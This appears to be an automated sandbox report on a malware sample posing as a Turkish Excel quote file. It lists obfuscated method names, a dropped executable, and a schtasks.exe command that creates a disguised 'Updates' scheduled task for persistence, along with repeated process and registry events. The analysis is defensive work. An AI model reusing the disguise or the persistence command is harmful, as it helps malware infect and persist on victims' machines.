Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, Q9xghsc13POXL59hd36.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'u85Bu5i7xO', 'aQ3BZdntuW', 'gMCBAHdROw', 'NWvBvlaLoG', 'tLrB5wuG4r', 'TdsBNjqoSn', 'wK2BCSJGZR'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, zn3NCY79dmYgsr4fSN.cs	High entropy of concatenated method names: 'ToqSMSZIGS', 'pQZSjTJ0kx', 'Jb2SXy7jOJ', 'duTSLAvi6C', 'rAVSHYxNFi', 'UOtSRC6voH', 'gU9SgrU4J8', 'uK4SJUDQyE', 'nCUS7KNbSZ', 'YprSxY92N0'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, LVnkPGSGbiRthtxoiS.cs	High entropy of concatenated method names: 'irnXIZYoL9', 'dp8XnmroBs', 'XoNXEALpOm', 'qyqXeXiqKC', 'aBnXD8KkZV', 'd2FXpv33Kf', 'YKjXlMd3Ur', 'i0EXSwkDiE', 'G2kXdApiJt', 'kMeXBXF6Qn'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, RTVPJ8XYj41c8rxLq2.cs	High entropy of concatenated method names: 'G63D8hWHGw', 'giDDopx3SQ', 'RvrDuWo39b', 'BFsDZlpW9e', 'B2FDcH77Ax', 'EdpDy49NMl', 'qClDUoXvQR', 'lp7D2fi1ny', 'SrGDQTMGOU', 'H4RDV3XSUt'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, gIg4FK4ptc3iNx3d5t.cs	High entropy of concatenated method names: 'wRElPNnvqU', 'nXVlTo7h9R', 'CiOSiKnHce', 'oxhSbPdQ88', 'gpil9IwqTi', 'LjsloLXQ0p', 'onflrkBGq0', 'DEHlupGW9J', 'AnSlZkakXo', 'z34lAr1JSd'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, igcy6eyM1j3LjtvZJ4.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'dJew6m5Ba2', 'wp1wT7a9Wc', 'RkpwzEwTMa', 'rkh1iChxIg', 'b351bvRT35', 'K3C1w8bsGs', 'HEb11Qoron', 'iCqwtQSsDopRtO3goQM'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, PmlP9aQ2SI5idMhMtL.cs	High entropy of concatenated method names: 'IZQSmpfMMR', 'GaiScNwT1T', 'CYYSysn0PK', 'GaHSUjr1s5', 'FKZSutFthS', 'J3SS250VYq', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, iuk0KnTfCYRw9jb2D8.cs	High entropy of concatenated method names: 'pWRdbJCrUT', 'QmWd125csB', 'OBHdhr8aX5', 'UNrdM7wArk', 'a9cdjGm5Gp', 'MMAdLKGEMy', 'g2OdHyl2h5', 'QNPSC5RCem', 'zHTSPfh04g', 'KFgS6AYAgO'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, RaXMABvfFfu6o5SOSX.cs	High entropy of concatenated method names: 'CqGttgN3h', 'G0uIOCG0a', 'FRknrvQ2N', 'tKtff0t4c', 'w5te3ZZfT', 'AuMYkaQXq', 'VSEyD3pMEtBHmcH8KS', 'HYycmCu58Ub9AFt5xv', 'rwbSRnjcp', 'obABqbI0S'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, we3YK7qH5g3FHYcDWm.cs	High entropy of concatenated method names: 'ToString', 'oIBp927gdn', 'LJXpcSgOyA', 'yImpyId8KS', 'DPmpUCiFU5', 'EX1p2uCmvC', 'EYPpQJX7tM', 'PNRpVdEQjg', 'm35pGrCgRZ', 'ux6psQEZDT'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, hqmIe8lu5adE3g7l3p.cs	High entropy of concatenated method names: 'B9jHFVF6Ol', 'ueuHj4J5PE', 'SkBHLyjcAS', 'kw8HRWMp7w', 'hsjHgHs9YU', 'wwKL5A6URS', 'ucaLNlKJhP', 'PUXLCYmvxJ', 'BOALPuOyG8', 'wYML65wlaA'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, gWIJvlOyuCsqmNZsPS.cs	High entropy of concatenated method names: 'UrmbRKQ5sU', 'AopbgQdIA8', 'SKVb70Hurd', 'fIvbxfBe5i', 'FEfbD2yc3T', 'XMZbpwqZf7', 'Dspcn65mXoymH9kVEk', 'yMMNt9JF3SOVneNc1L', 'PWnbbVuFpB', 'obvb10b9sG'
Source: 10.2.OnCgVRIhY.exe.2d0e8fc.0.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

File created: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
